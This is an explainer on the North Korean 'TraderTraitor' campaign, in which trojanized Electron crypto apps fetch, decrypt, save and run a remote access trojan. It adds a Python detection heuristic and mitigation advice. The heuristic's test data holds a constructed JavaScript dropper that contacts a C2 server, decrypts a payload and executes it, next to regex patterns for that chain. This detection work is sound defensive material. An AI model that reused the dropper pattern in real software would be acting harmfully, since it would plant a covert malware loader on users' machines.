In April 2022, CISA, the FBI and the US Treasury issued a joint Cybersecurity Advisory (AA22-108A) on a cyber threat dubbed "TraderTraitor", attributed to North Korean state-sponsored hacker groups (the activity cluster tracked as Lazarus Group, APT38 and BlueNoroff). These groups have targeted multiple organizations in the Web3 industry and focus on all things crypto: centralized exchanges, DeFi protocols, play-to-earn games, trading companies, VCs, and individuals holding large amounts of cryptocurrency. Using social engineering, the group persuades victims to download trojanized cryptocurrency applications for Windows or macOS, then uses that foothold to steal private keys, exploit other security gaps, and initiate fraudulent on-chain transactions.
These attacks often begin with targeted messages to employees of Web3 companies, particularly those in system administration, software development, or IT operations (DevOps). The messages usually mimic recruitment efforts, offering high-paying jobs to lure recipients into downloading the malware-laced cryptocurrency applications that the US government refers to as "TraderTraitor". These malicious applications are written in cross-platform JavaScript (Node.js with the Electron framework) and are derived from various open-source projects. They typically claim to be crypto trading or price prediction tools, and their campaigns feature modern, well-designed websites advertising innovative features and reward systems.
Below is a screenshot taken from one of the malicious sites.
Mechanism of attack:
The fake software contains code that looks like a routine update check but is actually a dropper designed to compromise the victim's machine and accounts. When the update routine is triggered, it contacts an attacker-controlled server and receives an encrypted response. The routine decrypts this data and saves it as a file on the user's computer.
Once the file is saved, the software executes it. The file is a remote access trojan (RAT); the payloads observed in the advisory were macOS and Windows variants of Manuscrypt, a custom RAT used by these groups. The RAT collects system information, executes arbitrary commands, and downloads additional malicious payloads. Post-compromise activity is tailored to each victim's environment, and the attackers have at times completed their objectives within a week of the initial intrusion.
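As an added illustration (not from the advisory or the original post), the chain described in the two paragraphs above can be turned into a static triage heuristic for an unpacked Electron bundle: look for the four stages (network request, decryption, file write, execution) and flag the bundle only when all four land close together, as they do inside a single dropper function. A legitimate app will use the network, crypto and filesystem too, but in unrelated places. The stage patterns, the 1,500-character window, and both sample snippets are constructed assumptions for this example; real bundles are minified and may be obfuscated, so treat a hit as a reason to look closer, not as proof of malice.

```python
"""Heuristic triage of an Electron/Node.js JavaScript bundle for the
TraderTraitor-style updater chain:
    request to server -> decrypt response -> write file -> execute file
"""
import re

# Node/Electron API calls that typically implement each stage. These patterns
# are this example's assumption; obfuscated bundles can hide every one of them.
STAGE_PATTERNS = {
    "network": [r"\bhttps?\.request\(", r"\bfetch\(", r"\baxios\.(?:post|get)\("],
    "decrypt": [r"\bcreateDecipheriv\(", r"\bCryptoJS\.AES\.decrypt\(", r"\.decrypt\("],
    "write_file": [r"\bwriteFileSync\(", r"\bwriteFile\(", r"\bcreateWriteStream\("],
    "execute": [r"\bchild_process\b", r"\bexecFile(?:Sync)?\(",
                r"\bspawn(?:Sync)?\(", r"\bexec(?:Sync)?\("],
}
# All four stages must occur within this many characters of each other
# (roughly one function body in an unminified bundle). Assumed value.
WINDOW = 1500


def find_stage_hits(js: str):
    """Return a list of (offset, stage) for every pattern match, sorted by offset."""
    hits = []
    for stage, patterns in STAGE_PATTERNS.items():
        for pat in patterns:
            for m in re.finditer(pat, js):
                hits.append((m.start(), stage))
    return sorted(hits)


def detect_updater_chain(js: str):
    """Report which stages appear and whether all of them co-occur within WINDOW.

    Uses a sliding window over the sorted hits: the window is shrunk from the
    left whenever it grows wider than WINDOW, and the chain is reported the
    first time every stage is present inside it.
    """
    hits = find_stage_hits(js)
    counts = {stage: 0 for stage in STAGE_PATTERNS}
    chain_offset = None
    left = 0
    for offset, stage in hits:
        counts[stage] += 1
        while offset - hits[left][0] > WINDOW:
            counts[hits[left][1]] -= 1
            left += 1
        if all(counts[s] > 0 for s in STAGE_PATTERNS):
            chain_offset = hits[left][0]   # start of the suspicious region
            break
    return {
        "stages": sorted({stage for _, stage in hits}),
        "chain_detected": chain_offset is not None,
        "chain_offset": chain_offset,
    }


# Constructed sample 1: an ordinary app that updates itself through
# electron-updater and caches a price feed. Network and file write are
# present, but nothing is decrypted and nothing is executed.
BENIGN_BUNDLE = """
const { autoUpdater } = require('electron-updater');
autoUpdater.checkForUpdatesAndNotify();
async function loadPrices() {
  const r = await fetch('https://prices.example.invalid/v1/ticker');
  fs.writeFileSync('cache.json', JSON.stringify(await r.json()));
}
"""

# Constructed sample 2: the dropper chain from the text, in one function.
SUSPICIOUS_BUNDLE = """
async function checkUpdate() {
  const res = await axios.post(C2 + '/update', { id: machineId });
  const key = Buffer.from(res.data.k, 'hex');
  const d = crypto.createDecipheriv('aes-256-cbc', key, iv);
  const payload = Buffer.concat([d.update(Buffer.from(res.data.b, 'base64')), d.final()]);
  fs.writeFileSync(path.join(os.tmpdir(), 'upd.bin'), payload);
  child_process.execFile(path.join(os.tmpdir(), 'upd.bin'));
}
"""

if __name__ == "__main__":
    for name, js in [("benign", BENIGN_BUNDLE), ("suspicious", SUSPICIOUS_BUNDLE)]:
        print(name, detect_updater_chain(js))
```

To use it on a real sample, unpack the application's `app.asar` (the `asar` npm tool does this) and run `detect_updater_chain` over each `.js` file. A positive hit is a cue to pull the network destination and the decryption key material out of that function and inspect them by hand.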
Several examples of malicious products:
TokenAIS - Poses as an AI based trading platform
CryptAIS - Poses as an AI based trading platform
Esilet - A project promising live cryptocurrency prices and price predictions
CreAIDeck - A project which pretends to provide "Artificial Intelligence and Deep Learning"
Steps to minimize risk of attack:
Keep your operating systems up-to-date with the latest verified security fixes
Protect all of your accounts and device access with strong passwords and multi-factor authentication.
Learn to recognize common scams and phishing attempts (the Web3 space is full of them!)
Always scan email attachments
Run up-to-date antivirus or endpoint protection software on all devices, including mobile devices
Only download software from trusted sources, and verify code signatures and published hashes before installing
Use application allowlisting so that only approved applications can run on company computers
Have an incident response plan in place in case you are compromised, and report any incident to both national and local authorities